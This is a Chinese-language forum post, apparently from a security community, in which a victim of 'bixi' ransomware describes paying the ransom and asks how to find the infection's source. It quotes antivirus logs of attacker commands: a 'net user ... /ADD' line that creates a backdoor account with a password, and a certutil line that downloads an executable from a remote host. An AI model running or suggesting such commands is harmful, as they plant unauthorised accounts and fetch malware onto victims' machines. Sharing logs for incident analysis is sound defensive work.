后缀 bixi 解密被勒索!! 了几万块!
缴纳赎金后 重新装系统了。现在观察,杀毒软件的日志如下附件
如何找到源头操作目标:【执行】 C:\Windows\System32\net.exe操作目标参数:net user k8h3d k8d3j9SjfS7 /ADD
[注意]看雪招聘,专注安全领域的专业人才平台!
2024.10.1 1点中毒,勒索信--见--本楼回复的。附件,发邮件给黑客,说3000美元一个ID,
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\certutil.exe
操作目标参数:certutil -urlcache -split -f bfdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2K9r3q4I4L8#2)9J5k6h3&6W2N6q4)9J5c8X3c8D9L8q4)9J5k6h3g2^5k6g2)9K6c8X3k6J5i4K6y4p5L8i4y4K6M7h3H3`. c:\setupinstalled.exe
操作结果:已阻止
这一条, 这个网站c86K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2K9r3q4I4L8#2)9J5k6h3&6W2N6q4)9J5c8X3c8D9L8q4)9J5k6h3g2^5k6b7`.`. 杀毒软件 提示是盗号木马,